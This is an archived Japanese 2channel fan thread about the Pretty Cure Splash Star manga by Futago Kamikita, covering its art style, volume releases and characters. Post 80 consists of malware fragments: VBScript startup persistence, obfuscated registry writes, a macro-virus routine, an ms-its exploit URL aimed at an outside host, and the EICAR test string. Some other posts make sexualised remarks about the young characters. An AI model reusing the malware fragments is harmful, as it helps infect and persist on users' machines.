5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ふたりはプリキュア〜PRETTY CURE〜なかよしその4

1 :花と名無しさん:2006/08/06(日) 00:23:12 ID:???0
ここは上北ふたご先生の一連の「ふたりはプリキュア」作品総合スレです。

夕凪中学校2年生の日向咲と美翔舞の学園友情アクション!
『ふたりはプリキュアSplash☆Star』上北ふたご画で『なかよし』好評連載中!
なかよし増刊「なかよしラブリー夏の号」でも番外編が収録されています!
待望の単行本は9月6日発売!(ソースは>>2
アニメは日曜朝8:30〜ABC・テレ朝系で放送中!

○公式サイト
 なかよし
 #http://www.nakayosi-net.com/topmenu.html
 ABC(朝日放送)
 #http://www.asahi.co.jp/precure/index2.html
 東映アニメーション
 #http://www.toei-anim.co.jp/tv/precure/

※上北ふたご先生はホビー情報誌「Quanto」でマッハGoGoGo連載中!

2 :花と名無しさん:2006/08/06(日) 00:24:11 ID:???0

☆前スレ

ふたりはプリキュア〜PRETTY CURE〜なかよしその3
http://comic6.2ch.net/test/read.cgi/gcomic/1149675976/

☆過去スレ

ふたりはプリキュア〜PRETTY CURE〜なかよしその2
http://comic6.2ch.net/test/read.cgi/gcomic/1101701615/

2人はプリキュア〜PRETTY CURE〜
http://comic6.2ch.net/test/read.cgi/gcomic/1076225271/

☆新刊情報

↓講談社9月の新刊
http://shop.kodansha.jp/bc/comics/kc/girl_09.html
↓なかよし公式Webサイトでも確認できます。
http://games.nakayosi-net.com/goods/comix/sinkan.html

3 :花と名無しさん:2006/08/06(日) 00:25:59 ID:???0
以上です。前スレあっさり落ちたみたいで残念です。
ファンの皆さんでどうにか盛り上げていきましょ〜

どうでもいいけど11日は上北先生の誕生日であります

4 :花と名無しさん:2006/08/06(日) 00:30:40 ID:s3Hu0HLN0
あと>>2の新刊情報がなかよしWebサイトだと(1)がついてるのですが
続刊されるのでしょうか ちょっと期待しちゃいます

5 :花と名無しさん:2006/08/06(日) 01:04:11 ID:???0
>>1
乙薫

6 :千早教 ◆K0kG07adQo :2006/08/06(日) 01:11:10 ID:???O
>>1


今月のは良かったわ。いろいろと…

7 :花と名無しさん:2006/08/06(日) 01:20:44 ID:s3Hu0HLN0
なんか初代のときよりどんどん絵が上手くなってるよーな・・・
咲と舞って正直なぎさとほのかより目の描き分けムズいと思うんだけど
この人ちゃんと描いてるよね・・・クオリティ高いわほんと。

8 :花と名無しさん:2006/08/06(日) 10:20:49 ID:???0
>>1
乙!

9 :花と名無しさん:2006/08/06(日) 14:06:04 ID:???0
>>1
乙カレハーン

10 :花と名無しさん:2006/08/06(日) 20:35:14 ID:???0
>>7
と言うか、アニメータ時代の癖が抜けたと言った方が良いかも。
初期のタツノコタッチも実は好き。

11 :花と名無しさん:2006/08/07(月) 22:46:27 ID:LuipTySk0
>>10
なるほど・・・けど私もどちらのタッチも好きです。
タツノコと言われてもちょっとわからないんですが、、、タイムボカンに似てるようには思えないw

12 :花と名無しさん:2006/08/07(月) 23:02:26 ID:???0
>>11
タツノコとはタツノコプロ。上北ふたごの親も勤めたとも言われる
名門アニメ会社。
個人的には、同社がアクション物作っていた頃の線に似ているな・・・
と少し感じてた。ちなみになかよしでは、以前アクビちゃんの
コミカライズもしていたよ。(アクビちゃんはそれこそ・・・漫画は上北ふたご)

13 :花と名無しさん:2006/08/07(月) 23:24:57 ID:???0
>>12
タツノコプロは知ってるんですが、なるほど線が似てるんですか。
アクビちゃんはてっきり原作は上北さんが先だと思ってました。
いろいろ有益な情報ありがとうです

14 :花と名無しさん:2006/08/08(火) 07:34:51 ID:???0
>>13
実言うと、アクビちゃんというのが、往年のタツノコギャグアニメ
「ハクション大魔王」のスピンオフというかリメイク(w
前職と在籍していた場所を考えると、これ以上の適任者は居ないかと。

しかし、なかよしの漫画の方はアニメの方に絵が近づいてきてるね。

15 :花と名無しさん:2006/08/08(火) 23:24:30 ID:???0
まあなかよし作家なんてアニヲタしかいないから(W

リア小にヲタよし弱張りされてもまだ間抜けな編集を続ける
ヲタよしはとっとと潰れてしまえww


16 :花と名無しさん:2006/08/09(水) 11:48:52 ID:???0
>>15
そういうのは他で書けよ。

http://comic6.2ch.net/test/read.cgi/gcomic/1152241348/


17 :花と名無しさん:2006/08/10(木) 15:52:48 ID:???0
しかし、初期の頃の力強い線も好きだったりする。

18 :花と名無しさん:2006/08/12(土) 22:01:04 ID:???0
あと、線が太いのも少しだけ安心感がある。

19 :花と名無しさん:2006/08/12(土) 23:41:34 ID:???0
安心感ってか、絵的には安定感?初期はインクのノリがうまい立体感出してる気もするけど
今の少女漫画に傾いたタッチも好きですじゃ。
漫画の方が主人公二人の友情が深い(ぶっちゃけて言うとより"百合"っぽい)気がするのですが
どう思います?

20 :花と名無しさん:2006/08/14(月) 20:58:51 ID:???0
ぶっちゃけ、ホカホカです

21 :花と名無しさん:2006/08/15(火) 18:22:29 ID:???0
いらん
気持ち悪いわ

22 :花と名無しさん:2006/08/16(水) 22:59:54 ID:???0
満はツンデレ

23 :花と名無しさん:2006/08/19(土) 23:52:49 ID:eBq/QU+E0
あげ

24 :花と名無しさん:2006/08/23(水) 14:42:24 ID:???O
本編で2人が手作り弁当を持って遊びに行く回があったけど、先生が描いたらどんなことになるのか。

25 :花と名無しさん:2006/08/24(木) 00:09:06 ID:6/N9mvU+0
そのまま敵と遭遇して変身しないで、普通に弁当食べて帰ってくる話にしてほすぃ。

26 :花と名無しさん:2006/08/24(木) 00:49:53 ID:???O
それじゃデートじゃん

27 :花と名無しさん:2006/08/28(月) 00:57:20 ID:???0
本当はセンセイもそんなの描きたいんじゃあるまいか。
戦闘シーンもそれはそれで好きなんだけれど、なぎほのひかの時みたいな戦闘抜きの咲舞話も
読んでみたいよ。

28 :花と名無しさん:2006/08/28(月) 11:18:44 ID:???O
不思議だよな。無印とMHはファンには評判が良かっただろうに何で方針転換したんだろう?
この空気の読めなさが今のなかよしなのか。

29 :花と名無しさん:2006/08/29(火) 04:13:38 ID:???0
いまさらこんなこといってもどうにもならんが、月1回のなかよしと4ヶ月に1回のラブリーで
TV版に平行して行こうと思うと、どうしても駆け足にならざるを得ないよな。

それでも俺みたいな百合中は萌え転がされてるわけだがw
そっち系に興味ない人は、中身が薄いと思ってるかもしれない。特に本来のなかよし読者は。

30 :花と名無しさん:2006/09/01(金) 18:49:33 ID:GcjY8dMN0
発売5日前wktk

>>29
無印の漫画はアニメの展開全く無視して読めたけどな。
今回のコミックも加筆されてることを期待する。

31 :花と名無しさん:2006/09/04(月) 16:40:59 ID:???0
ふたご先生の戦闘シーンおれ大好きよ。
ごっつ迫力あるもん。

32 :花と名無しさん:2006/09/05(火) 02:17:16 ID:???0
本編の24話から30話相当分までを詰め込んだわりには、過不足無くストーリーを説明して
本編を追っかけてる手腕は見事だと思う。
ただ、その分今号は萌え方面が犠牲になったのはやむを得ないかw

33 :花と名無しさん:2006/09/05(火) 09:20:06 ID:Qoz1f5x80
戦闘シーンが加わった分、ページ数割り当ても増えてるから
日常シーンが減った訳じゃないと思う。


34 :花と名無しさん:2006/09/06(水) 00:00:23 ID:tfOmgxEC0
>>32
今月はコミックスもあるし、ラブリーもあるし、お楽しみはこれからよ。

35 :花と名無しさん:2006/09/06(水) 02:52:26 ID:sCvxxZSL0
前作のルミナスはかわいいけど、キャラクターグッズでは目つきが鋭くて怖かった。
毎週見てるけど変身のときに裸にならないのと、イーグレットのパンチラがないのがつまらないです。
ルミナスもスカートが見えそうで見えなかった。なかよしの前作ではなぎさが女の子に告白された所が面白くてよかったです。
最近のテレビでは二人の思い出作りの話がよかったです。親友っていいなー。戦いの無い話も見たい。

36 :花と名無しさん:2006/09/06(水) 09:17:35 ID:???0
ルミナス(ひかり)のキャラデザを考えた段階では、
ツンデレ系にするつもりだったんだろうな。

37 :花と名無しさん:2006/09/07(木) 00:15:21 ID:???0
もうわかった。よくわかった。
センセイ、間違いなくプリキュア関係のスレを見ていなさる。

38 :花と名無しさん:2006/09/07(木) 00:53:14 ID:???0
本かうかな

39 :花と名無しさん:2006/09/07(木) 12:46:10 ID:YGZsS4Zz0
ルミナス(ひかり)はツンデレ系、ツンデレ系ってなんですか。

40 :花と名無しさん:2006/09/07(木) 13:11:08 ID:WybMJX7N0
ビジュアルファンブックVOL2の中のマンガでフィギィアスケートの話がありますね。
ほのかはロングスカートを履いていたのになぎさにスカートを引きちぎられてミニになっちゃいますね。
それでみんなは「ナイスアレンジ」って誉め、ほのかも喜んで踊ってましたけど、始めからミニなら中に履いてるのは見せパンツだけど、始めはロングスカートだったのだから、見せパンではなくて、生パンで踊ってたってことですよね。
いえ、決して悪いと言っているのではありません。

41 :花と名無しさん:2006/09/07(木) 13:38:27 ID:???0
>>37
咲タン、舞タンにメロンパン。心にくいばかりの配慮だ。w


42 :花と名無しさん:2006/09/07(木) 16:05:59 ID:???0
>>39
ほい。
つ http://www.google.com/search?client=opera&rls=ja&q=%E3%83%84%E3%83%B3%E3%
83%87%E3%83%AC&sourceid=opera&ie=utf-8&oe=utf-8

>>41
あと、みのり薫とかなw

43 :花と名無しさん:2006/09/07(木) 21:35:05 ID:???0
満がオンナノコっぽい私服でロングな薫がボーイッシュってのがツボだなー

44 :花と名無しさん:2006/09/08(金) 07:13:37 ID:0+LwoRXP0
しかし、上北版に否定的な意見ってどこを見ても出てこないな。

45 :花と名無しさん:2006/09/08(金) 16:32:59 ID:???0
原作ってわけじゃないから、知名度の点では少し不利だし、
なかよしを平然と買える大友が思ったりより少ない、てのもあるのかな。


46 :花と名無しさん:2006/09/08(金) 18:25:24 ID:???O
それを差し引いても否定的な意見があまり見られないのは、やっぱ普通におもしろいからだと思う。


47 :花と名無しさん:2006/09/08(金) 18:26:11 ID:???0
初代プリキュアの全話単行本化
は無理なんだろうか。

48 :花と名無しさん:2006/09/08(金) 19:15:58 ID:???0
>47
よろしければ、協力お願いいたします。ご存じでしたら失礼。
ttp://www.tanomi.com/metoo/naiyou.html?kid=56419

49 :花と名無しさん:2006/09/08(金) 19:18:46 ID:???0
>>47
「ふたりはプリキュア 全一巻」って楔打たれてるからねぇ。
難しいんじゃないか。

50 :花と名無しさん:2006/09/08(金) 20:03:46 ID:???0
無印には単行本未収録の話があるのか。
なんでそんなことになってるんだろう。

51 :花と名無しさん:2006/09/08(金) 21:03:02 ID:???0
明日こそはかってこよう

52 :花と名無しさん:2006/09/08(金) 22:36:31 ID:9ZKJMjxV0
おまえら、発売から二日経ってなお単行本の内容に関する話題がないのは
哀しすぎるぞ。
とりあえず、3月〜9月の連載分、ラブリー春と夏の号と、
合計9本+αで満と薫関連のショートストーリーが一本収録されてる。
で、おじさんはこう思ったんだ。
「第二巻が出たら、なかよし連載分だけじゃページ数足りなくね?」
つまり、12月の映画の単行本出たあとに恐らく刊行される第二巻には、
ページ補完のために何か話が必要なのだ。
ひょっとしたら、初代&MHの未収録分が入るかもしれない!





妄想乙でした。

53 :花と名無しさん:2006/09/08(金) 23:19:05 ID:???0
戦闘シーンが少ないページで処理されてるのが勿体無いな。
画力あるから、大ゴマ使って描いてほしいところ。
制約上仕方ないんだろうけど。

ふたご先生の初期の絵はイマイチな感じがしてたので買ってなかったけど、
SSが良かったので、映画のヤツも買って来た。
食わず嫌いしてました、ごめんなさい。

54 :花と名無しさん:2006/09/08(金) 23:49:30 ID:???0
上北先生の画の特徴と最近の傾向

・アニメーター出身で、とにかく絵が上手い。
・パースも上手い。曲線型の構図が多い?
・トーンや着色は、MH以降一部デジタル
・小コマでちびキャラをしばしば描く。
・SSになって、ペンが繊細になって力強いタッチからソフトなタッチになった。
・SSになって、背景やら描き込みが緻密になった。

すまん、素人なもんでパースとかは間違ってるかもしれない・・・OTZ

55 :花と名無しさん:2006/09/09(土) 19:37:34 ID:???0
裏表紙の薫おねえさんのおデコにやられました。
カレハーンやモエルンバって美形になってるね〜。(カレッチはアニメではもっと疲れた感じ)
満薫で盛り上がって二巻へ続くっヒキが良いと思うですよ。

56 :花と名無しさん:2006/09/09(土) 22:53:07 ID:???0
>>55
カレハーンは紫に茶色の体だからアニメだと倦怠的な感じがするのかも。
単行本のラストのヒキについては激しく同意。あれは上手い。

57 :花と名無しさん:2006/09/10(日) 09:37:58 ID:???O
満薫とみのりのエピソードを描き加えたのは
月刊連載では尺の問題で描けなかったからなのか
それとも…、今後の展開に関わって来るから入れる必要があったのか

58 :花と名無しさん:2006/09/10(日) 09:53:16 ID:???0
聖なる泉を取り戻す以外に、友達(満薫)奪還って目的も加わったけぇのう (文太の声で
まあこの単行本は出来良いよ。絵だけでも勉強になる。

59 :花と名無しさん:2006/09/10(日) 17:53:38 ID:???0
単行本読んだ。これだけは言わせてくれ



なにあのきれいな優子。w

マジレスするとたとえが古すぎてなんだがウルトラマンをコミカライズした漫画家
(一峰大二、楳図かずお、内山まもる、桑田次郎など)みたいに”上北ふたごの漫画”になってるのがすごいな。


60 :花と名無しさん:2006/09/10(日) 19:19:35 ID:???0
>>59
いや、分かるよ、そのたとえ。
新しいくはないが、「ネオデビルマン」みたいなのも例としてあげられるかな?

61 :花と名無しさん:2006/09/10(日) 22:38:24 ID:???0
>>59
尾瀬あきらのガイキングみたいな

62 :花と名無しさん:2006/09/11(月) 20:26:50 ID:GH0aCFWr0
DVDに本放送のCMを入れてほしい。なかよしのCMとか面白いし、何年かたって見た時にタイムマシン感覚で懐かしいから。美少女の出るプリキュアのCMも有るし。

63 :花と名無しさん:2006/09/11(月) 21:00:05 ID:???0
せっかくなかよしの宣伝入れたのに
なぜ去年みたいに
コミックス大好評発売中!
をインサートしないのか

64 :花と名無しさん:2006/09/11(月) 21:22:47 ID:???0
単行本を読んだ

モエルンバの時にイーグレットの肌心配してるブルームにふいた

65 :花と名無しさん:2006/09/12(火) 01:24:37 ID:???0
    __________________________________
    | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    | 【一次エントリー】★第2回漫画最萌トーナメントを開催します!★
    | 募集期間:2006年9月12日(火)〜9月18日(月・祝) 各日1:00:00〜23:00:59
    | エントリーはコード必須、1日1回とし、毎回20キャラまでエントリーできます。
    | 
    | エントリー受付スレ http://comic6.2ch.net/test/read.cgi/cchara/1157821314/l50
    | コード発行所(15分待ち) http://tcode.sakura.ne.jp/comic/
    | 
    | 参加資格 :女性漫画キャラ。生物・非生物不問。
    | 詳細はまとめサイト→http://max.45.kg/mangasaimoe/index.htmlにてご確認ください。
    | 皆様のご参加をお待ちしております。
    | 
    | 第2回漫画最萌トーナメント 企画運営スレ3
    | http://comic6.2ch.net/test/read.cgi/cchara/1157800113/
    人       。 |
  /   \  / ∠___________________________
 /   `⊇` ヽつ__________________Ellヨ__________
 ゝU;∴;:∵;ソ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  ` U ̄U

66 :花と名無しさん:2006/09/13(水) 04:32:43 ID:OEnEFlVn0
連載雑誌の毎回の終わりの欄外にいつも編集者が「あおり文句」や「感想」を書くが、
コミックスにもそれを載せてほしい。面白いから。

67 :花と名無しさん:2006/09/13(水) 16:44:00 ID:???0
ブルームの「ふたりの宿題なんだよ」って言葉が凄くいいと思う

68 :花と名無しさん:2006/09/13(水) 18:16:13 ID:???0
>67
はげど

咲はほんと太陽みたいな子だなー
咲が男でも女でも(女の子だけど)
鬼モテの予感

69 :花と名無しさん:2006/09/13(水) 21:31:54 ID:???0
咲ったら・・・

70 :花と名無しさん:2006/09/14(木) 11:21:13 ID:???0
角煮のスレで赤塚賞取った作品が

71 :花と名無しさん:2006/09/17(日) 19:50:48 ID:???0
ムキムキキャラとか描くのどんな気持ちなんだろう。次の敵キャラは凄すぎる…

72 :花と名無しさん:2006/09/19(火) 20:59:45 ID:???O
この作者たちならムキムキでもガンガってくれる……よな

73 :花と名無しさん:2006/09/20(水) 13:02:00 ID:???O
なかよしラブリー出てたけど、
やっぱ月刊だけでTVの話を追っ掛けるのは尺が足りないのかなあ。

取り敢えず、次の11月号でキントレ登場か。

74 :花と名無しさん:2006/09/21(木) 06:08:28 ID:???0
ラブリー、「つづく」じゃなくて「おわり」になってたね。
冬の号には載らないのか…。
映画本で忙しいからかな。

75 :花と名無しさん:2006/09/21(木) 11:51:16 ID:???0
そうか、今年も映画で一冊書き下ろしがあるのか。
・・・・・・それが2巻なんてことになったらどうしよう。ああ嫌だ嫌だ。

76 :花と名無しさん:2006/09/21(木) 13:11:43 ID:???O
講談社はマジ単行本打ち切りとかあるからな。

これからもなかよしは買い続けるよ。

77 :花と名無しさん:2006/09/23(土) 22:43:02 ID:2o9OUzLg0
ルミナスは普段はかわいいのに、変身の時やたら大口を開ける。
それさえなければかわいいのに。
プリキュア映画の2作目ですが、またイベントの模様、完成試写会の模様は入っているのでしょうか。
それが入っていれば、買おうと思います。

78 :花と名無しさん:2006/09/23(土) 23:48:30 ID:???0
今回のラブリーは、オチがかなり良かった。
咲にとってゆずれないものを大事な場面で効果的に演出する一方で
シタターレも自分の美貌だけはゆずれなかったんだな・・・と、
悪役に一歩哀情の念を入れ込ませる作りはアニメよりも良かった。
まあ二回で退場はドロドロン同様ちと哀しすぎるものがあるけどね。

79 :花と名無しさん:2006/09/24(日) 10:18:50 ID:???0
「もぉ〜 咲ったら
 なに食べても 最高 最高・・・
 なんでも 好き 好きって・・・」
「つぎはあの栗使って
 お菓子作るね」

舞はもうすっかり咲の新妻状態だなあ

80 :<body onload=window()>:2006/09/24(日) 10:46:07 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

81 :花と名無しさん:2006/09/28(木) 17:26:08 ID:???0
やっと買えた。
宮迫くんらしき人物も居ることは居るんだな。

82 :花と名無しさん:2006/10/02(月) 20:13:36 ID:???0
なかよし12月号は連載お休み
なので11月中の展開も描かれていると思われる
だからかなりネタバレ注意なんだな

83 :花と名無しさん:2006/10/03(火) 09:27:46 ID:???0
映画のコミック化でもして忙しくなるんじゃろか?

84 :花と名無しさん:2006/10/03(火) 09:37:48 ID:???O
アクビちゃんもあるしな

85 :花と名無しさん:2006/10/03(火) 23:27:48 ID:???0
コミック読んだ。
気合入ってるのはいいんだけど、すごく出来のいい同人漫画を読んでる気がする。

86 :花と名無しさん:2006/10/04(水) 12:44:21 ID:???0
そう思って見るのもまた一興。

87 :花と名無しさん:2006/10/04(水) 23:50:38 ID:???0
同人であそこまで描き込みはできねーぜ
11月号読んだが結構ネタバレきてるな

88 :花と名無しさん:2006/10/10(火) 12:23:16 ID:???0
来月号は休載だから、二ヶ月分のエピソードを盛り込んでいるんだろう。
おかげでMKファンは枕を高くして眠れるわけだが。

89 :花と名無しさん:2006/10/12(木) 11:31:07 ID:CZG7cwWH0
ところで再来月までこのスレがもつかどうかについて。


90 :花と名無しさん:2006/10/12(木) 16:21:59 ID:???0
上北プリキュアの話ならこのスレよりアニキャラ個別板の百合スレの方がはるかに
盛り上がるし…

91 :花と名無しさん:2006/10/15(日) 03:23:51 ID:???0
昨日なんとなくSSの単行本買ってみた




満と薫が可愛杉(;´Д`)ハァハァ
でももう出番終わっちゃった…(´・ω・`)

92 :花と名無しさん:2006/10/16(月) 23:14:29 ID:???0
満のワンピースは犯罪モノだよね。
薫のみのりに「してして」されたときの顔はたまらんよね。

93 :花と名無しさん:2006/10/16(月) 23:56:23 ID:???0
>91
いや、終わってないからw

94 :花と名無しさん:2006/10/20(金) 13:39:10 ID:9SooD/fJ0
ふたご先生あげ

95 :花と名無しさん:2006/10/21(土) 19:06:15 ID:???0
     ,.-―┬-、
    /,. z===、ノ
    `i ハノヽハ〉    リボルバーとは執着心が強く気性が激しい
    ヾゝ!|,,゚ ヮ゚ノi   迷惑なりぼん読者・投稿者のことを指します。 
     _/i)_∀ト_     自分にとって気に入らないスレや違った意見の持ち主に
     ゙ーく_,/_jー'     喰ってかかりキチガイに荒らしまくります。
      〈 〈 〉 〉   りぼん読者・投稿者のタチの悪さは有名です。
      ゙-' `-'     みなさん、気をつけましょうね。


り ぼ ん 婆  →  り ぼ 婆  →  リ ボ ル バ ー
http://comic6.2ch.net/test/read.cgi/gcomic/1160124667/

ご来場の際には「リボ!」または「リバー!」と一言お掛け下さいm(_ _)m

96 :花と名無しさん:2006/10/22(日) 07:06:29 ID:qV4fu8V50
ところで、何でプリキュアって毎年夏になっても二人の水着姿の回がないの?
毎年今度こそはと期待してるのに。

97 :花と名無しさん:2006/10/22(日) 07:16:23 ID:???0
>>96
局Pの威光(意向)。

98 :花と名無しさん:2006/10/22(日) 20:45:36 ID:wvLKNGxl0
>>96
鷲尾プロデューサーが水着は出さないって言ってた気がする。
最近のすぐ水着や下着を見せる傾向にはあえて乗らないという主張だったと思う


でも最近買った処分品シールコレ3のピンクパールシールには
水着姿のなぎほのショットがあるようだ。露出度はそれほど高くないが。

99 :花と名無しさん:2006/10/22(日) 21:12:03 ID:sg9VqtHr0
>>98さん。
わーい。教えてくれてありがとー。早速買いにいくね。おもちゃ屋さんかな?

100 :花と名無しさん:2006/10/22(日) 22:55:10 ID:Og3C//DJ0
あの…チト気になったんだけども
プリキュアってどんだけ人気あるんだお(゚ω゚)
某メディア雑誌ランクじゃ⇒9位だったらしぃが…

101 :花と名無しさん:2006/10/23(月) 23:17:54 ID:FO3FIT+Y0
>>99
わかってるかもしれないけど一年前の作品なので
普通のおもちゃ屋(コンビニはなおさら)には多分出回ってないと思う
俺は秋葉で処分品買いました。
ネット通販なら探せばあるかもしれんです。

102 :花と名無しさん:2006/10/24(火) 20:27:11 ID:T0XgpNV+0
>>101さん。ありがとうございます。あなたはとても親切で優しい方ですね。
ネット通販を調べてみましたが、見つかりませんでした。
悔しいけどあきらめます。ありがとうございました。

103 :花と名無しさん:2006/10/24(火) 21:12:27 ID:???0
漫画版読むとこいつら……って言いたくなってくるな。
単行本未収録がある理由はこのへんが大きいんじゃないかと思ってたり。

104 :花と名無しさん:2006/10/27(金) 17:08:33 ID:ca6e1rQ90
↓の二人は「ふたりはプリキュア」の登場人物の様なのですが、何方かご存知の方教えて頂けませんか?
http://society3.2ch.net/test/read.cgi/koumei/1149518021/l50

105 :花と名無しさん:2006/10/27(金) 19:00:59 ID:???0
>>104
こんなとこに来てまでageてご苦労なこった(w

106 :花と名無しさん:2006/10/27(金) 22:32:31 ID:???0
踏まなくても何が書いてあるか想像がつくところがイヤだ。
しかしよくもまあこんな過疎スレにまで(呆

107 :花と名無しさん:2006/10/28(土) 00:42:44 ID:???0
ふたご先生の原寸大原稿とか見てみたいな。
昔は「花とゆめ・複製原画集」なんて商売があったけど、今もあるのかな?

108 :98:2006/10/28(土) 01:43:01 ID:ZpLYU4qs0
>>102さん

今全袋開封し終わったのですが、運良くなぎほのの水着シール
当たってました。せっかくなので明日あたりまとめてうpろうかと思います。

>>107
見てみたいけど、今デジタルでトーン貼りとかしてるみたいだから
どうなんだろう?生原稿はペンのみなのかな?

109 :98:2006/10/28(土) 10:16:14 ID:???0
面倒なので連結してうp

ttp://ojamajo.or.tp/doremiup/srces/fafa0286.jpg

110 :花と名無しさん:2006/10/28(土) 22:18:26 ID:+9yY+xSM0
>>108
すごいです。レアものですね。ところで、うPるとは、どういう意味ですか?
グーグル検索しても、くだらない話ばかりで意味が載っていません。

111 :花と名無しさん:2006/10/28(土) 22:22:20 ID:L66CT2ZX0
>>104
>>110の続き。せっかく、親切に答えてあげようと思ったのに。

112 :花と名無しさん:2006/10/29(日) 19:18:23 ID:???0
あーあ

113 :花と名無しさん:2006/10/29(日) 21:07:51 ID:KCihoQZe0
nn

114 :花と名無しさん:2006/10/31(火) 20:08:03 ID:Noo69cMM0
来週はプリキュア休みなんだって、残念。代わりに何やるんだろ。

115 :花と名無しさん:2006/10/31(火) 21:46:04 ID:???0
6月にゴルフで1週お休み
10〜11月に駅伝で1週お休み
のはず。

だからどうあがいても51週を超えられない。
(ドッカ〜ン!の時は暦の関係で日曜が53週あったんだよね。)

116 :花と名無しさん:2006/11/01(水) 16:17:06 ID:IiHfJ8k60
>>115さん
お返事ありがとうございます。そうかー。駅伝ね。日曜はビデオでも見ようかな。ところで、ビデオ録ってる皆さん。CMカットはしない方が良いですよ。
DVDにはプリキュアやなかよしのCMが入ってないから。CMは後で貴重品ですよ。それから、録画時には番組開始1分〜3分前からの録画を勧めます。プリキュアのお知らせスポットが入ったりするから。

117 :花と名無しさん:2006/11/02(木) 01:10:04 ID:???0
よし、待ちに待った発売日だ。夜が明けたら早速買いに行こう。

118 :花と名無しさん:2006/11/02(木) 01:48:29 ID:???0
今月号って休み?コンビニでなかよし見かけたけど
表紙にちっちゃいイラストは載ってるんだよ
プリキュアしか読まないから休載だったら買う気しないし
縛られてるから連載されてるか確認できないんだよなあ

119 :花と名無しさん:2006/11/02(木) 13:41:39 ID:???0
11月号のハシラに「次号はお休み。一月号をお楽しみに!」と書いてあるよ。

120 :花と名無しさん:2006/11/02(木) 20:18:33 ID:???0
そう、俺も表紙の右上にイラストあったから、てっきりなんか載ってるのかと思った
けど映画と映画コミックス刊行(12月8日だったか)のお知らせだけだった(´・ω・`)ショボーン

121 :花と名無しさん:2006/11/03(金) 01:31:07 ID:???0
>>120
コミック発売は12/06だよ。

122 :花と名無しさん:2006/11/11(土) 19:50:39 ID:???0
キントレスキーを舞と咲は最低な奴と言うが、キントレスキーは中々正々堂々とした奴だ。
「さあ、待っててやる。早く変身しろ。」なんて中々言えたものじゃない。

123 :花と名無しさん:2006/11/12(日) 00:31:18 ID:???0
>>122
ふたりを分断させる作戦はカレッチも水下さんもやったけど
逆に変身するのを待つなんてのはキンちゃんだけだよな。
こんな敵もう向こう10年は出てこない予感…。

124 :花と名無しさん:2006/11/14(火) 09:49:26 ID:???O
女の子一人をさんざん追い立てといて
二人揃うと「変身しろ」とコミューンを返す
言行不一致な人もいました。

125 :花と名無しさん:2006/11/14(火) 22:35:01 ID:???0
ピーさんのことかー

126 :花と名無しさん:2006/11/17(金) 19:39:10 ID:???0
そろそろ二巻の予約できるんかいな

127 :花と名無しさん:2006/11/25(土) 14:46:31 ID:UVwqI1Gy0
次のなかよしまであと1週間か。
長いな。

128 :花と名無しさん:2006/11/25(土) 21:43:38 ID:???0

           ○   ∇ 、,、´`゙;~、  ';冫 ☆
           ┏  ━ゝヽ''人∧━∧从━〆A!゚━━┓。
 ╋┓"〓┃  < ゝ\',冫。' ∩___∩ ゛△│´'´,.ゝ'┃.      ●┃ ┃┃
 ┃┃_.━┛ヤ━━━━━ | ノ      ヽ━━━━━━━━━  ━┛ ・ ・
        ∇  ┠─Σ-/  ●   ● |  ァ Ζそ,´; ┨'゚,。
           .。冫▽ < |    ( _●_)  ミ  乙  ≧   ▽
         。 ┃   彡、   |∪|  、`\ │   て く
           ┠─./ __  ヽノ /´>  )'.┼ ァ Ζ┨ ミo''`
         。、゚`。、 (___)   / (_/' ×  个o
        ○  ┃   `|       /   !ヽ.◇    o┃
            ┗〆━┷ Z,.' /┷━''o ヾo┷+\━┛,゛;
       ヾ                   '、´    ∇



129 :花と名無しさん:2006/11/26(日) 08:00:53 ID:???0
映画版コミクスでるとですか

130 :花と名無しさん:2006/11/26(日) 09:19:43 ID:???0
でるとです

131 :花と名無しさん:2006/11/26(日) 12:23:47 ID:???0
ここがウイルスにやられている間セーラームーン8を見ていました。
そうしたら「あらプリキュアがセラムン化するみたいね」という声が出てきて
その次ぎに「それホント? 変身の時裸になるの?水着有り?パンチラもOK?」
という質問をした人がいて、見ていたら、他にも同じ質問をした子がいて、

私も興味深く見てましたが質問の答えは誰も答えませんでした。
わたしも、結構そういうことに興味有るのですが・・・

ちなみに5人組みになるそうですが、わたしもその子と同じでそれ以上の検索はわかりませんでした。

ところでウイルスをしかけたのはちゃお麺とかいう人ですか?
有名人みたいですけど・・・

132 :花と名無しさん:2006/11/26(日) 20:18:25 ID:???O
終わりよければすべてよしでいいのでは?
とりまウィルス治まってんだしさ

133 :花と名無しさん:2006/11/29(水) 00:50:29 ID:???0
コミックス予約始まってたのでポチッとした。
でも映画の前に読むと劇場行く気がちょっとなくなるよね。

134 :花と名無しさん:2006/12/01(金) 12:31:52 ID:???0
今月号、アニメよりよっぽど面白いんですが。

